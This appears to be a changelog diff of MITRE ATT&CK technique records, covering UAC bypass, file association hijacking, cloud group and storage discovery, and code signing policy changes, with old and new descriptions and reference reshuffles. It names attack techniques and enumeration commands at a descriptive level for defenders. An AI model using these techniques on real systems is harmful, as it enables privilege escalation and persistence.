STIX FieldOld valueNew Value
modified2021-10-18 12:11:16.808000+00:002022-02-25 18:58:15.229000+00:00
external_references[4]['url']https://cobaltstrike.com/downloads/csmanual38.pdfhttps://web.archive.org/web/20210825130434/https://cobaltstrike.com/downloads/csmanual38.pdf
x_mitre_data_sources[0]Process: Process ModificationProcess: Process Access
x_mitre_data_sources[1]Process: Process AccessProcess: Process Modification

[T1548.002] Abuse Elevation Control Mechanism: Bypass User Account Control

Current version: 2.0


Old Description
New Description
t1Adversaries may bypass UAC mechanisms to elevate process prit1Adversaries may bypass UAC mechanisms to elevate process pri
>vileges on system. Windows User Account Control (UAC) allows>vileges on system. Windows User Account Control (UAC) allows
> a program to elevate its privileges (tracked as integrity l> a program to elevate its privileges (tracked as integrity l
>evels ranging from low to high) to perform a task under admi>evels ranging from low to high) to perform a task under admi
>nistrator-level permissions, possibly by prompting the user >nistrator-level permissions, possibly by prompting the user 
>for confirmation. The impact to the user ranges from denying>for confirmation. The impact to the user ranges from denying
> the operation under high enforcement to allowing the user t> the operation under high enforcement to allowing the user t
>o perform the action if they are in the local administrators>o perform the action if they are in the local administrators
> group and click through the prompt or allowing them to ente> group and click through the prompt or allowing them to ente
>r an administrator password to complete the action. (Citatio>r an administrator password to complete the action.(Citation
>n: TechNet How UAC Works)  If the UAC protection level of a >: TechNet How UAC Works)  If the UAC protection level of a c
>computer is set to anything but the highest level, certain W>omputer is set to anything but the highest level, certain Wi
>indows programs can elevate privileges or execute some eleva>ndows programs can elevate privileges or execute some elevat
>ted [Component Object Model](https://attack.mitre.org/techni>ed [Component Object Model](https://attack.mitre.org/techniq
>ques/T1559/001) objects without prompting the user through t>ues/T1559/001) objects without prompting the user through th
>he UAC notification box. (Citation: TechNet Inside UAC) (Cit>e UAC notification box.(Citation: TechNet Inside UAC)(Citati
>ation: MSDN COM Elevation) An example of this is use of [Run>on: MSDN COM Elevation) An example of this is use of [Rundll
>dll32](https://attack.mitre.org/techniques/T1218/011) to loa>32](https://attack.mitre.org/techniques/T1218/011) to load a
>d a specifically crafted DLL which loads an auto-elevated [C> specifically crafted DLL which loads an auto-elevated [Comp
>omponent Object Model](https://attack.mitre.org/techniques/T>onent Object Model](https://attack.mitre.org/techniques/T155
>1559/001) object and performs a file operation in a protecte>9/001) object and performs a file operation in a protected d
>d directory which would typically require elevated access. M>irectory which would typically require elevated access. Mali
>alicious software may also be injected into a trusted proces>cious software may also be injected into a trusted process t
>s to gain elevated privileges without prompting a user.(Cita>o gain elevated privileges without prompting a user.(Citatio
>tion: Davidson Windows)  Many methods have been discovered t>n: Davidson Windows)  Many methods have been discovered to b
>o bypass UAC. The Github readme page for UACME contains an e>ypass UAC. The Github readme page for UACME contains an exte
>xtensive list of methods(Citation: Github UACMe) that have b>nsive list of methods(Citation: Github UACMe) that have been
>een discovered and implemented, but may not be a comprehensi> discovered and implemented, but may not be a comprehensive 
>ve list of bypasses. Additional bypass methods are regularly>list of bypasses. Additional bypass methods are regularly di
> discovered and some used in the wild, such as:  * <code>eve>scovered and some used in the wild, such as:  * <code>eventv
>ntvwr.exe</code> can auto-elevate and execute a specified bi>wr.exe</code> can auto-elevate and execute a specified binar
>nary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Cit>y or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citati
>ation: Fortinet Fareit)  Another bypass is possible through >on: Fortinet Fareit)  Another bypass is possible through som
>some lateral movement techniques if credentials for an accou>e lateral movement techniques if credentials for an account 
>nt with administrator privileges are known, since UAC is a s>with administrator privileges are known, since UAC is a sing
>ingle system security mechanism, and the privilege or integr>le system security mechanism, and the privilege or integrity
>ity of a process running on one system will be unknown on re> of a process running on one system will be unknown on remot
>mote systems and default to high integrity.(Citation: SANS U>e systems and default to high integrity.(Citation: SANS UAC 
>AC Bypass)>Bypass)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-07-22 21:36:52.458000+00:002022-04-19 15:11:20.036000+00:00
descriptionAdversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works) If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows) Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as: * eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit) Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works) If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box.(Citation: TechNet Inside UAC)(Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows) Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as: * eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit) Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)
external_references[1]['source_name']TechNet How UAC WorksDavidson Windows
external_references[1]['description']Lich, B. (2016, May 31). How User Account Control Works. Retrieved June 3, 2016.Davidson, L. (n.d.). Windows 7 UAC whitelist. Retrieved November 12, 2014.
external_references[1]['url']https://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-workshttp://www.pretentiousname.com/misc/win7_uac_whitelist2.html
external_references[2]['source_name']TechNet Inside UACTechNet How UAC Works
external_references[2]['description']Russinovich, M. (2009, July). User Account Control: Inside Windows 7 User Account Control. Retrieved July 26, 2016.Lich, B. (2016, May 31). How User Account Control Works. Retrieved June 3, 2016.
external_references[2]['url']https://technet.microsoft.com/en-US/magazine/2009.07.uac.aspxhttps://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-works
external_references[3]['source_name']MSDN COM ElevationSANS UAC Bypass
external_references[3]['description']Microsoft. (n.d.). The COM Elevation Moniker. Retrieved July 26, 2016.Medin, T. (2013, August 8). PsExec UAC Bypass. Retrieved June 3, 2016.
external_references[3]['url']https://msdn.microsoft.com/en-us/library/ms679687.aspxhttp://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypass
external_references[4]['source_name']Davidson WindowsMSDN COM Elevation
external_references[4]['description']Davidson, L. (n.d.). Windows 7 UAC whitelist. Retrieved November 12, 2014.Microsoft. (n.d.). The COM Elevation Moniker. Retrieved July 26, 2016.
external_references[4]['url']http://www.pretentiousname.com/misc/win7_uac_whitelist2.htmlhttps://msdn.microsoft.com/en-us/library/ms679687.aspx
external_references[5]['source_name']Github UACMeenigma0x3 Fileless UAC Bypass
external_references[5]['description']UACME Project. (2016, June 16). UACMe. Retrieved July 26, 2016.Nelson, M. (2016, August 15). "Fileless" UAC Bypass using eventvwr.exe and Registry Hijacking. Retrieved December 27, 2016.
external_references[5]['url']https://github.com/hfiref0x/UACMEhttps://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
external_references[6]['source_name']enigma0x3 Fileless UAC Bypassenigma0x3 sdclt app paths
external_references[6]['description']Nelson, M. (2016, August 15). "Fileless" UAC Bypass using eventvwr.exe and Registry Hijacking. Retrieved December 27, 2016.Nelson, M. (2017, March 14). Bypassing UAC using App Paths. Retrieved May 25, 2017.
external_references[6]['url']https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/
external_references[7]['source_name']Fortinet Fareitenigma0x3 sdclt bypass
external_references[7]['description']Salvio, J., Joven, R. (2016, December 16). Malicious Macro Bypasses UAC to Elevate Privilege for Fareit Malware. Retrieved December 27, 2016.Nelson, M. (2017, March 17). "Fileless" UAC Bypass Using sdclt.exe. Retrieved May 25, 2017.
external_references[7]['url']https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malwarehttps://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/
external_references[8]['source_name']SANS UAC BypassTechNet Inside UAC
external_references[8]['description']Medin, T. (2013, August 8). PsExec UAC Bypass. Retrieved June 3, 2016.Russinovich, M. (2009, July). User Account Control: Inside Windows 7 User Account Control. Retrieved July 26, 2016.
external_references[8]['url']http://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypasshttps://technet.microsoft.com/en-US/magazine/2009.07.uac.aspx
external_references[9]['source_name']enigma0x3 sdclt app pathsFortinet Fareit
external_references[9]['description']Nelson, M. (2017, March 14). Bypassing UAC using App Paths. Retrieved May 25, 2017.Salvio, J., Joven, R. (2016, December 16). Malicious Macro Bypasses UAC to Elevate Privilege for Fareit Malware. Retrieved December 27, 2016.
external_references[9]['url']https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware
external_references[10]['source_name']enigma0x3 sdclt bypassGithub UACMe
external_references[10]['description']Nelson, M. (2017, March 17). "Fileless" UAC Bypass Using sdclt.exe. Retrieved May 25, 2017.UACME Project. (2016, June 16). UACMe. Retrieved July 26, 2016.
external_references[10]['url']https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/https://github.com/hfiref0x/UACME
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation

[T1546.001] Event Triggered Execution: Change Default File Association

Current version: 1.0


Old Description
New Description
t1Adversaries may establish persistence by executing malicioust1Adversaries may establish persistence by executing malicious
> content triggered by a file type association. When a file i> content triggered by a file type association. When a file i
>s opened, the default program used to open the file (also ca>s opened, the default program used to open the file (also ca
>lled the file association or handler) is checked. File assoc>lled the file association or handler) is checked. File assoc
>iation selections are stored in the Windows Registry and can>iation selections are stored in the Windows Registry and can
> be edited by users, administrators, or programs that have R> be edited by users, administrators, or programs that have R
>egistry access (Citation: Microsoft Change Default Programs)>egistry access or by administrators using the built-in assoc
> (Citation: Microsoft File Handlers) or by administrators us> utility.(Citation: Microsoft Change Default Programs)(Citat
>ing the built-in assoc utility. (Citation: Microsoft Assoc O>ion: Microsoft File Handlers)(Citation: Microsoft Assoc Oct 
>ct 2017) Applications can modify the file association for a >2017) Applications can modify the file association for a giv
>given file extension to call an arbitrary program when a fil>en file extension to call an arbitrary program when a file w
>e with the given extension is opened.  System file associati>ith the given extension is opened.  System file associations
>ons are listed under <code>HKEY_CLASSES_ROOT\.[extension]</c> are listed under <code>HKEY_CLASSES_ROOT\.[extension]</code
>ode>, for example <code>HKEY_CLASSES_ROOT\.txt</code>. The e>>, for example <code>HKEY_CLASSES_ROOT\.txt</code>. The entr
>ntries point to a handler for that extension located at <cod>ies point to a handler for that extension located at <code>H
>e>HKEY_CLASSES_ROOT\[handler]</code>. The various commands a>KEY_CLASSES_ROOT\\[handler]</code>. The various commands are
>re then listed as subkeys underneath the shell key at <code>> then listed as subkeys underneath the shell key at <code>HK
>HKEY_CLASSES_ROOT\[handler]\shell\[action]\command</code>. F>EY_CLASSES_ROOT\\[handler]\shell\\[action]\command</code>. F
>or example:  * <code>HKEY_CLASSES_ROOT\txtfile\shell\open\co>or example:   * <code>HKEY_CLASSES_ROOT\txtfile\shell\open\c
>mmand</code> * <code>HKEY_CLASSES_ROOT\txtfile\shell\print\c>ommand</code> * <code>HKEY_CLASSES_ROOT\txtfile\shell\print\
>ommand</code> * <code>HKEY_CLASSES_ROOT\txtfile\shell\printt>command</code> * <code>HKEY_CLASSES_ROOT\txtfile\shell\print
>o\command</code>  The values of the keys listed are commands>to\command</code>  The values of the keys listed are command
> that are executed when the handler opens the file extension>s that are executed when the handler opens the file extensio
>. Adversaries can modify these values to continually execute>n. Adversaries can modify these values to continually execut
> arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2>e arbitrary commands.(Citation: TrendMicro TROJ-FAKEAV OCT 2
>012)>012)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesMicrosoft. (n.d.). Change which programs Windows 7 uses by default. Retrieved July 26, 2016.
external_referencesCAPEC-556
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-556
external_referencesSioting, S. (2012, October 8). TROJ_FAKEAV.GZD. Retrieved August 8, 2018.
values_changed
STIX FieldOld valueNew Value
modified2020-01-24 13:40:47.282000+00:002022-04-20 16:55:49.219000+00:00
descriptionAdversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access (Citation: Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or by administrators using the built-in assoc utility. (Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened. System file associations are listed under HKEY_CLASSES_ROOT\.[extension], for example HKEY_CLASSES_ROOT\.txt. The entries point to a handler for that extension located at HKEY_CLASSES_ROOT\[handler]. The various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\[handler]\shell\[action]\command. For example: * HKEY_CLASSES_ROOT\txtfile\shell\open\command * HKEY_CLASSES_ROOT\txtfile\shell\print\command * HKEY_CLASSES_ROOT\txtfile\shell\printto\command The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility.(Citation: Microsoft Change Default Programs)(Citation: Microsoft File Handlers)(Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened. System file associations are listed under HKEY_CLASSES_ROOT\.[extension], for example HKEY_CLASSES_ROOT\.txt. The entries point to a handler for that extension located at HKEY_CLASSES_ROOT\\[handler]. The various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\\[handler]\shell\\[action]\command. For example: * HKEY_CLASSES_ROOT\txtfile\shell\open\command * HKEY_CLASSES_ROOT\txtfile\shell\print\command * HKEY_CLASSES_ROOT\txtfile\shell\printto\command The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands.(Citation: TrendMicro TROJ-FAKEAV OCT 2012)
external_references[1]['source_name']capecMicrosoft Change Default Programs
external_references[1]['url']https://capec.mitre.org/data/definitions/556.htmlhttps://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
external_references[2]['source_name']Microsoft Change Default ProgramsMicrosoft File Handlers
external_references[2]['description']Microsoft. (n.d.). Change which programs Windows 7 uses by default. Retrieved July 26, 2016.Microsoft. (n.d.). Specifying File Handlers for File Name Extensions. Retrieved November 13, 2014.
external_references[2]['url']https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programshttp://msdn.microsoft.com/en-us/library/bb166549.aspx
external_references[3]['source_name']Microsoft File HandlersMicrosoft Assoc Oct 2017
external_references[3]['description']Microsoft. (n.d.). Specifying File Handlers for File Name Extensions. Retrieved November 13, 2014.Plett, C. et al.. (2017, October 15). assoc. Retrieved August 7, 2018.
external_references[3]['url']http://msdn.microsoft.com/en-us/library/bb166549.aspxhttps://docs.microsoft.com/windows-server/administration/windows-commands/assoc
external_references[4]['source_name']Microsoft Assoc Oct 2017TrendMicro TROJ-FAKEAV OCT 2012
external_references[4]['description']Plett, C. et al.. (2017, October 15). assoc. Retrieved August 7, 2018.Sioting, S. (2012, October 8). TROJ_FAKEAV.GZD. Retrieved August 8, 2018.
external_references[4]['url']https://docs.microsoft.com/windows-server/administration/windows-commands/assochttps://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
external_references[5]['source_name']TrendMicro TROJ-FAKEAV OCT 2012capec
external_references[5]['url']https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzdhttps://capec.mitre.org/data/definitions/556.html
x_mitre_data_sources[1]Windows Registry: Windows Registry Key ModificationCommand: Command Execution
x_mitre_data_sources[2]Command: Command ExecutionWindows Registry: Windows Registry Key Modification

[T1069.003] Permission Groups Discovery: Cloud Groups

Current version: 1.3


Old Description
New Description
t1Adversaries may attempt to find cloud groups and permission t1Adversaries may attempt to find cloud groups and permission 
>settings. The knowledge of cloud permission groups can help >settings. The knowledge of cloud permission groups can help 
>adversaries determine the particular roles of users and grou>adversaries determine the particular roles of users and grou
>ps within an environment, as well as which users are associa>ps within an environment, as well as which users are associa
>ted with a particular group.  With authenticated access ther>ted with a particular group.  With authenticated access ther
>e are several tools that can be used to find permissions gro>e are several tools that can be used to find permissions gro
>ups. The <code>Get-MsolRole</code> PowerShell cmdlet can be >ups. The <code>Get-MsolRole</code> PowerShell cmdlet can be 
>used to obtain roles and permissions groups for Exchange and>used to obtain roles and permissions groups for Exchange and
> Office 365 accounts (Citation: Microsoft Msolrole)(Citation> Office 365 accounts (Citation: Microsoft Msolrole)(Citation
>: GitHub Raindance).  Azure CLI (AZ CLI) and the Google Clou>: GitHub Raindance).  Azure CLI (AZ CLI) and the Google Clou
>d Identity Provider API also provide interfaces to obtain pe>d Identity Provider API also provide interfaces to obtain pe
>rmissions groups. The command <code>az ad user get-member-gr>rmissions groups. The command <code>az ad user get-member-gr
>oups</code> will list groups associated to a user account fo>oups</code> will list groups associated to a user account fo
>r Azure while the API endpoint <code>GET https://cloudidenti>r Azure while the API endpoint <code>GET https://cloudidenti
>ty.googleapis.com/v1/groups</code> lists group resources ava>ty.googleapis.com/v1/groups</code> lists group resources ava
>ilable to a user for Google (Citation: Microsoft AZ CLI)(Cit>ilable to a user for Google.(Citation: Microsoft AZ CLI)(Cit
>ation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: >ation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: 
>Google Cloud Identity API Documentation).  Adversaries may a>Google Cloud Identity API Documentation)  Adversaries may at
>ttempt to list ACLs for objects to determine the owner and o>tempt to list ACLs for objects to determine the owner and ot
>ther accounts with access to the object, for example, via th>her accounts with access to the object, for example, via the
>e AWS <code>GetBucketAcl</code> API (Citation: AWS Get Bucke> AWS <code>GetBucketAcl</code> API (Citation: AWS Get Bucket
>t ACL). Using this information an adversary can target accou> ACL). Using this information an adversary can target accoun
>nts with permissions to a given object or leverage accounts >ts with permissions to a given object or leverage accounts t
>they have already compromised to access the object.>hey have already compromised to access the object.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2021-06-25 12:13:37.940000+00:002022-04-19 02:44:58.838000+00:00
descriptionAdversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group. With authenticated access there are several tools that can be used to find permissions groups. The Get-MsolRole PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts (Citation: Microsoft Msolrole)(Citation: GitHub Raindance). Azure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command az ad user get-member-groups will list groups associated to a user account for Azure while the API endpoint GET https://cloudidentity.googleapis.com/v1/groups lists group resources available to a user for Google (Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation). Adversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS GetBucketAcl API (Citation: AWS Get Bucket ACL). Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object.Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group. With authenticated access there are several tools that can be used to find permissions groups. The Get-MsolRole PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts (Citation: Microsoft Msolrole)(Citation: GitHub Raindance). Azure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command az ad user get-member-groups will list groups associated to a user account for Azure while the API endpoint GET https://cloudidentity.googleapis.com/v1/groups lists group resources available to a user for Google.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation) Adversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS GetBucketAcl API (Citation: AWS Get Bucket ACL). Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object.
external_references[1]['source_name']Microsoft MsolroleAWS Get Bucket ACL
external_references[1]['description']Microsoft. (n.d.). Get-MsolRole. Retrieved October 6, 2019.Amazon Web Services. (n.d.). Retrieved May 28, 2021.
external_references[1]['url']https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrole?view=azureadps-1.0https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetBucketAcl.html
external_references[2]['source_name']GitHub RaindanceBlack Hills Red Teaming MS AD Azure, 2018
external_references[2]['description']Stringer, M.. (2018, November 21). RainDance. Retrieved October 6, 2019.Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active Directory Leaks via Azure. Retrieved October 6, 2019.
external_references[2]['url']https://github.com/True-Demon/raindancehttps://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
external_references[3]['source_name']Microsoft AZ CLIGoogle Cloud Identity API Documentation
external_references[3]['description']Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.Google. (n.d.). Retrieved March 16, 2021.
external_references[3]['url']https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latesthttps://cloud.google.com/identity/docs/reference/rest
external_references[4]['source_name']Black Hills Red Teaming MS AD Azure, 2018Microsoft AZ CLI
external_references[4]['description']Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active Directory Leaks via Azure. Retrieved October 6, 2019.Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
external_references[4]['url']https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
external_references[5]['source_name']Google Cloud Identity API DocumentationMicrosoft Msolrole
external_references[5]['description']Google. (n.d.). Retrieved March 16, 2021.Microsoft. (n.d.). Get-MsolRole. Retrieved October 6, 2019.
external_references[5]['url']https://cloud.google.com/identity/docs/reference/resthttps://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrole?view=azureadps-1.0
external_references[6]['source_name']AWS Get Bucket ACLGitHub Raindance
external_references[6]['description']Amazon Web Services. (n.d.). Retrieved May 28, 2021.Stringer, M.. (2018, November 21). RainDance. Retrieved October 6, 2019.
external_references[6]['url']https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetBucketAcl.htmlhttps://github.com/True-Demon/raindance
x_mitre_contributors[1]Isif IbrahimaIsif Ibrahima, Mandiant
x_mitre_data_sources[0]Process: Process CreationCommand: Command Execution
x_mitre_data_sources[1]Command: Command ExecutionApplication Log: Application Log Content
x_mitre_data_sources[2]Group: Group EnumerationGroup: Group Metadata
x_mitre_data_sources[3]Group: Group MetadataProcess: Process Creation
x_mitre_data_sources[4]Application Log: Application Log ContentGroup: Group Enumeration

[T1619] Cloud Storage Object Discovery

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-07 18:19:25.352000+00:002022-04-11 22:29:43.677000+00:00
x_mitre_contributors[1]Isif IbrahimaIsif Ibrahima, Mandiant
x_mitre_data_sources[0]Cloud Storage: Cloud Storage EnumerationCloud Storage: Cloud Storage Access
x_mitre_data_sources[1]Cloud Storage: Cloud Storage AccessCloud Storage: Cloud Storage Enumeration

[T1553.006] Subvert Trust Controls: Code Signing Policy Modification

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['Administrator']
values_changed
STIX FieldOld valueNew Value
modified2021-04-26 15:41:39.155000+00:002022-05-05 05:00:03.480000+00:00
external_references[1]['source_name']Microsoft DSE June 2017Apple Disable SIP
external_references[1]['description']Microsoft. (2017, June 1). Digital Signatures for Kernel Modules on Windows. Retrieved April 22, 2021.Apple. (n.d.). Disabling and Enabling System Integrity Protection. Retrieved April 22, 2021.
external_references[1]['url']https://docs.microsoft.com/en-us/previous-versions/windows/hardware/design/dn653559(v=vs.85)?redirectedfrom=MSDNhttps://developer.apple.com/documentation/security/disabling_and_enabling_system_integrity_protection
external_references[2]['source_name']Apple Disable SIPF-Secure BlackEnergy 2014
external_references[2]['description']Apple. (n.d.). Disabling and Enabling System Integrity Protection. Retrieved April 22, 2021.F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.
external_references[2]['url']https://developer.apple.com/documentation/security/disabling_and_enabling_system_integrity_protectionhttps://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf
external_references[3]['source_name']Microsoft Unsigned Driver Apr 2017FireEye HIKIT Rootkit Part 2
external_references[3]['description']Microsoft. (2017, April 20). Installing an Unsigned Driver during Development and Test. Retrieved April 22, 2021.Glyer, C., Kazanciyan, R. (2012, August 22). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 2). Retrieved May 4, 2020.
external_references[3]['url']https://docs.microsoft.com/en-us/windows-hardware/drivers/install/installing-an-unsigned-driver-during-development-and-testhttps://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-2.html
external_references[4]['source_name']Microsoft TESTSIGNING Feb 2021Microsoft Unsigned Driver Apr 2017
external_references[4]['description']Microsoft. (2021, February 15). Enable Loading of Test Signed Drivers. Retrieved April 22, 2021.Microsoft. (2017, April 20). Installing an Unsigned Driver during Development and Test. Retrieved April 22, 2021.
external_references[4]['url']https://docs.microsoft.com/en-us/windows-hardware/drivers/install/the-testsigning-boot-configuration-optionhttps://docs.microsoft.com/en-us/windows-hardware/drivers/install/installing-an-unsigned-driver-during-development-and-test
external_references[5]['source_name']FireEye HIKIT Rootkit Part 2Microsoft DSE June 2017
external_references[5]['description']Glyer, C., Kazanciyan, R. (2012, August 22). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 2). Retrieved May 4, 2020.Microsoft. (2017, June 1). Digital Signatures for Kernel Modules on Windows. Retrieved April 22, 2021.
external_references[5]['url']https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-2.htmlhttps://docs.microsoft.com/en-us/previous-versions/windows/hardware/design/dn653559(v=vs.85)?redirectedfrom=MSDN
